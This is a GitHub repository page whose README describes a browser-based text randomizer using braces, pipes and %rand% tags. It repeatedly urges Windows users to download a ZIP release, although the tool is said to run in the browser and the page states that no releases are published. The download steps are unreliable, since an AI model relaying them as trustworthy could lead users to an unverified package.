Skip to content

Adrielc7958/random.airat.top

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 

Repository files navigation

🎲 random.airat.top - Simple Text Randomizer Tool

Download Latest Release

📝 What is random.airat.top?

random.airat.top is a client-side tool that randomizes text. It works without sending your data anywhere, keeping it private. You can create varied versions of text using synonyms, changes in order, and special tags like %rand%. This tool supports unlimited nesting, so you can build complex random outputs.

You can get output in plain text, JSON, or CSV formats. It also allows you to download the results as .txt or .json files. The tool runs completely in your browser using standard web technologies — no installation needed except downloading the latest release to run offline.

Use it for content creation, testing, or any task where you need unique text versions without duplicates.

Visit the main site: https://random.airat.top


🚀 Getting Started

This section will guide you through getting the program on your Windows machine and running it. You don’t need to know how to code.

System Requirements

  • Windows 10 or newer
  • A modern web browser such as Chrome, Edge, or Firefox (to open the app)
  • At least 100 MB free disk space
  • No internet connection needed after download

Download the Application

  1. Click the large button above or visit this page to download the app:

    Download random.airat.top Releases

  2. On the releases page, look for the latest version listed. It will have files ready for download.

  3. Since this tool runs as a local web app, download the ZIP file named random.airat.top-win.zip or similar. This ZIP contains everything you need to run the application.

  4. Save the ZIP file in a location you can easily reach, like your Desktop or Downloads folder.


📂 Installing and Running the App

Step 1: Extract the ZIP File

  • Right-click the downloaded ZIP file.
  • Choose “Extract All…”
  • Select a folder to extract to (for example, create a new folder on your Desktop named random.airat.top).
  • Wait for the extraction to complete.

Step 2: Open the Application

  • Go to the folder where you extracted the files.
  • Look for a file called index.html.
  • Double-click the index.html file. This will open the app in your default web browser.
  • Now the app is ready to use.

You do not need to install anything else. The app runs entirely in your browser.


💡 How to Use random.airat.top

Input Your Text

  • In the text box provided, type or paste the text you want to randomize.

  • Use synonyms to replace words or phrases easily.

  • Apply curly braces {} and pipes | to set permutations. For example:

    {quick|fast|speedy} brown fox

    This gives variations like “quick brown fox”, “fast brown fox”, or “speedy brown fox”.

Use %rand% Tags

  • Insert %rand% within your text to add random numbers or choices.
  • The app will replace these tags with unique random values to keep output fresh.

Unlimited Nesting

  • You can nest permutations inside others without limit. For example:

    {The {quick|fast} fox|A {lazy|sleepy} dog}
  • This creates many unique sentences by mixing choices from inside and outside braces.

Choose Output Format

  • Select from Text, JSON, or CSV format.
  • Text will be plain sentences.
  • JSON will structure your results as a list.
  • CSV is ideal if you want to load output in spreadsheet programs.

Download Your Results

  • After the output is generated, click the download button.
  • Choose .txt or .json format for your saved file.
  • This makes it easy to keep or share the randomized text.

⚙️ Settings and Features

No Duplicates

The app guarantees unique output. It avoids repeating the exact same sentence or phrase in any generated batch.

Offline-First Design

Once you download the app, it works entirely offline. There is no need for a constant internet connection.

Privacy

All data processing happens in your browser on your PC. Nothing is sent to servers or third parties.

Supported Files and Formats

  • Input supports plain text format.
  • Output can be saved as:
    • .txt for simple text
    • .json for structured data
  • CSV output is compatible with Excel and similar programs.

User Interface

  • The app uses clean, simple design built with HTML, CSS, and JavaScript.
  • It is easy to understand and operate.
  • No advanced skills needed.

❓ Troubleshooting and Tips

  • If index.html does not open, try to open it with a different browser.
  • Always extract the ZIP fully before trying to run the app.
  • Make sure your browser is updated to the latest version.
  • If output looks incorrect, double-check your input syntax using braces {}, pipes |, and %rand%.
  • For best results, keep input text clear and organized.

🧰 Development and Source Code

This project uses vanilla JavaScript with no external dependencies. It is designed to be privacy-friendly and lightweight.

You can view or fork the source code on GitHub here:

https://github.com/Adrielc7958/random.airat.top


📥 Download Again

You can download the latest Windows version anytime from the releases page.

Download random.airat.top Releases

About

Generate unique, privacy-first text randomizations fully in-browser with support for synonyms, permutations, and large batch outputs without duplicates.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors